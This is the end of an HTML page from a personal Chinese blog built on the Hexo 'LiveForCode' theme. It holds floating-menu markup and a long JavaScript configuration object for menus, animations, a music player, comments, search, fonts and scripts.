            <a href="javascript:;" target="_self" class="search">
                <div class="iconbox">
                    <span class="iconfont icon-search-menu"></span>
                    <span class="icontext">搜索</span>
                </div>
            </a>
            <div class="iconbox bottom">
                <div style="display: inline-block; transform: rotate(180deg);">
                    <span class="iconfont icon-top"></span>
                </div>
                <span class="icontext">跳至底部</span>
            </div>
        </div>
        <div class="iconbox set">
            <div style="display: inline-block;">
                <span class="iconfont icon-setting"></span>
            </div>
            <span class="icontext">设置</span>
        </div>
        <div class="iconbox top">
            <span class="iconfont icon-top"></span>
            <span class="icontext">返回顶部</span>
        </div>
    </div>
    <div class="loading"></div>
</div>
    <script>
    window.config = {
        GitHubUserName     : "zhangyuhaimian",
        GitHubRepositories : "zhangyuhaimian",

        User             : "章鱼海绵",
        UserAvatar       : "/image/sidebar/touxiang.jpg",
        WebsiteStartDate : "2023-02-10",

        WebsiteTitleBlur         : "(◍´꒳`◍) Hi, Live For Code",
        WebsiteTitleBlurTimeOut  : 500,
        WebsiteTitleFocus        : "(*´∇｀*) 欢迎回来!",
        WebsiteTitleFocusTimeOut : 1000,
        WebsiteFavicon           : "/image/website/logo.png",

        ProgressBar : {
            id       : "topProgressBar",
            color    : "#77B6FF",
            height   : "2px",
            duration : 0.2
        },

        Loading: {
            rebound : {
                tension  : 16,
                friction : 5
            },
            spinner : {
                id     : "spinner",
                radius : 90,
                sides  : 3,
                depth  : 4,
                colors : {
                    background : "#F0F0F0",
                    stroke     : "#272633",
                    base       : "",
                    child      : "#272633"
                },
                alwaysForward : true,
                restAt        : 0.5,
                renderBase    : false
            }
        },

        HomeHeaderAnimationRendered : true,
        HomeHeaderAnimation         : {
            radius      : 15,
            density     : 0.2,
            color       : "rgba(255, 255, 255, .2)",
            clearOffset : 0.3
        },

        BackAnimationRendered          : true,
        IEBrowserBackAnimationRendered : false,
        BackAnimation                  : {
            colorSaturation  : "60%",
            colorBrightness  : "50%",
            colorAlpha       : 0.5,
            colorCycleSpeed  : 5,
            verticalPosition : "random",
            horizontalSpeed  : 200,
            ribbonCount      : 3,
            strokeSize       : 0,
            parallaxAmount   : -0.2,
            animateSections  : true
        },

        HomeHeaderImage : [
            
                "/image/header/home.jpg",
            
                "/image/header/back.jpg",
            
        ],
        HomeBannerText  : "",

        ArticleHeaderImage : [
            
                "/image/header/article.jpg",
            
        ],

        OtherBannerText : "",

        Error : {
            icon    : "icon-swimming",
            title   : "PAGE NOT FOUND",
            content : [
                
                    "很抱歉，您访问的页面不存在！",
                
                    "可能是输入地址有误或该地址已变更。",
                
            ],
            buttons : [
                
                    {
                        icon  : "icon-home",
                        text  : "返回首页",
                        href  : "/",
                        class : ""
                    },
                
            ]
        },

        MenuNotice : {
            enable : true,
            notice : "简单地活着，肆意而又精彩！",
            speed  : 20
        },
        MenuList : [
            
                {
                    name   : "首页",
                    icon   : "icon-home-fill",
                    href   : "/",
                    type   : "index",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "分类",
                    icon   : "icon-folder-fill",
                    href   : "/category",
                    type   : "category",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "标签",
                    icon   : "icon-discount-fill",
                    href   : "/tag",
                    type   : "tag",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "归档",
                    icon   : "icon-calendar-fill",
                    href   : "/archive",
                    type   : "archive",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "赞赏",
                    icon   : "icon-heart-fill",
                    href   : "/donate",
                    type   : "donate",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "关于",
                    icon   : "icon-about-fill",
                    href   : "/about",
                    type   : "about",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "订阅",
                    icon   : "icon-rss",
                    href   : "/atom.xml",
                    type   : "",
                    class  : "",
                    target : "_blank"
                },
            
                {
                    name   : "搜索",
                    icon   : "icon-search-menu",
                    href   : "javascript:;",
                    type   : "",
                    class  : "search",
                    target : "_self"
                },
            
                {
                    name   : "留言板",
                    icon   : "icon-comments-fill",
                    href   : "/comment",
                    type   : "comment",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "友情链接",
                    icon   : "icon-link",
                    href   : "/friend",
                    type   : "friend",
                    class  : "",
                    target : "_self"
                },
            
        ],
        MenuLink : [
            
                
                    {
                        name   : "知乎",
                        icon   : "icon-zhihu",
                        href   : "https://www.4399.com/",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
                    {
                        name   : "微博",
                        icon   : "icon-weibo",
                        href   : "https://www.4399.com/",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
                    {
                        name   : "QQ",
                        icon   : "icon-qq",
                        href   : "javascript:;",
                        class  : "image",
                        target : "_self",
                        image  : "/image/sidebar/qq.png"
                    },
                
                    {
                        name   : "微信",
                        icon   : "icon-wechat",
                        href   : "javascript:;",
                        class  : "",
                        target : "_self",
                        image  : "/image/sidebar/weixin.png"
                    },
                
                    {
                        name   : "GitHub",
                        icon   : "icon-github",
                        href   : "https://github.com/zhangyuhaimian/zhangyuhaimian.github.io",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
            
        ],

        FooterStyle : 2,
        BottomText  : "<div><span class='face'>ღゝ◡╹)ノ♡</span></div><div>【人生若只如初见<span><i class='iconfont icon-like-fill'></i></span>何事秋风悲画扇】</div><div>&copy; 2020-2022 WorstOne. All Rights Reserved.</div>",

        ConsoleList : [
            
                
                    [
                        
                            
                                "Based on cnblogs theme SimpleMemory.",
                            
                                "",
                            
                        
                    ],
                
                    [
                        
                            
                                "SimpleMemory Author:",
                            
                                "BNDong",
                            
                        
                    ],
                
                    [
                        
                            
                                "Theme:",
                            
                                "LiveForCode",
                            
                        
                    ],
                
            
        ],

        FontIconExtend : "",

        Donate : {
            paypal  : "",
            bitcoin : "",
            alipay  : "/image/donate/wechat.png",
            wechat  : "/image/donate/wechat.png"
        },

        Search : {
            applicationID : "010C3EANT8",
            apiKey        : "c7abab9f11b79102b9aff7fe6d41447d",
            indexName     : "Notes",
            hits          : {
                page : 10
            },
            labels        : {
                placeholder : "搜索",
                empty       : "未发现与 「${query}」 相关的内容",
                stats       : "${hits} 条相关条目，使用了 ${time} 毫秒",
            }
        }, 

        Valine : {
            switch         : true,
            el             : ".comments-content",
            appId          : "srhKtvWPQTWYKh3qX8G8M7v0-gzGzoHsz",
            appKey         : "8uVSP1q6UlALVC5igYfIfv2h",
            serverURLs     : "",
            placeholder    : "你是我一生只会遇见一次的惊喜...",
            avatar         : "mm",
            meta           : "nick,mail,link",
            requiredFields : "nick,mail",
            pageSize       : 5,
            lang           : "zh-cn",
            visitor        : true,
            enableQQ       : true
        },

        Tocbot : {
            switch                : true,
            tocSelector           : ".toc",
            contentSelector       : ".article-body",
            headingSelector       : "h1, h2, h3, h4, h5",
            headingsOffset        : 0,
            scrollSmooth          : true,
            scrollSmoothOffset    : -5,
            positionFixedSelector : ".toc",
            positionFixedClass    : "toc-fixed",
            fixedSidebarOffset    : "",
        },

        Require : {
            baseUrl     : "/js/",
            waitSeconds : 100
        },

        Music : {
            type : "APlayer"
        },
        APlayer : {
            container : ".aplayer",
            fixed     : true,
            autoplay  : true,
            loop      : "all",
            order     : "random",
            preload   : "auto",
            volume    : 0.67,
            mutex     : true,
            lrcType   : 3,
            audio     : [
                
                    {
                        name   : "镇海",
                        artist : "不良人",
                        cover  : "/music/cover/shuai.jpg",
                        url    : "/music/song/zhenhai.mp3",
                        lrc    : "/music/lrc/Endless Tears.lrc"
                    },
                
            ]
        },
        Meting : {
            id       : "3778678", 
            lrcshow  : false, 
            server   : "netease", 
            type     : "playlist", 
            fixed    : true, 
            autoplay : true, 
            loop     : "all", 
            order    : "random", 
            preload  : "auto", 
            volume   : 0.67, 
            mutex    : false
        },

        Mouse : {
            enable  : true,
            options : {
                size  : 6,
                sizeF : 24
            }
        },

        LazyLoad : {
            default : "/image/website/lazyload.svg"
        },
  
        Style : {
            aplayer          : "/css/APlayer.css",
            archive          : "/css/archive.css",
            base             : "/css/base.css",
            clipboard        : "/css/clipboard.css",
            code             : "/css/code.css",
            donate           : "/css/donate.css",
            fancybox         : "/css/jquery.fancybox.css",
            footer           : "/css/footer.css",
            iconfont         : "/iconfont/iconfont.css",
            index            : "/css/index.css",
            menuBubble       : "/css/menu-bubble.css",
            mouse            : "/css/mouse.css",
            page             : "/css/page.css",
            post             : "/css/post.css",
            search           : "/css/search.css",
            tocbot           : "/css/tocbot.css",
            valine           : "/css/valine.css"
        },

        Script: {
            aplayer          : "/js/APlayer.min.js",
            config           : "/js/require.config.js",
            index            : "/js/index.js",
            instantSearch    : "/js/instantsearch.min.js",
            iscroll          : "/js/iscroll.js",
            jQuery           : "/js/jquery-3.4.1.min.js",
            loading          : "/js/loading.js",
            meting           : "/js/Meting.min.js",
            require          : "/js/require.min.js"
        },

        Font: {
            LongCang    : "/font/LongCang.css",
            Monda       : "/font/Monda.css",
            NotoSansSC  : "/font/NotoSansSC.css",
            NotoSerifSC : "/font/NotoSerifSC.css",
            Playball    : "/font/Playball.css",
            PTMono      : "/font/PTMono.css",
            Roboto      : "/font/Roboto.css",
            RobotoSlab  : "/font/RobotoSlab.css",
            Rosario     : "/font/Rosario.css",
            UbuntuMono  : "/font/UbuntuMono.css"
        },

        Suffix : {
            about : "简单地活着, 肆意又精彩."
        },
            
        Theme : {
            url  : "https://github.com/first19326/Hexo-LiveForCode",
            name : "Hexo - Live For Code"
        }  
    };
</script>
    <script type="text/javascript" src="/js/index.js"></script>
</body>
</html>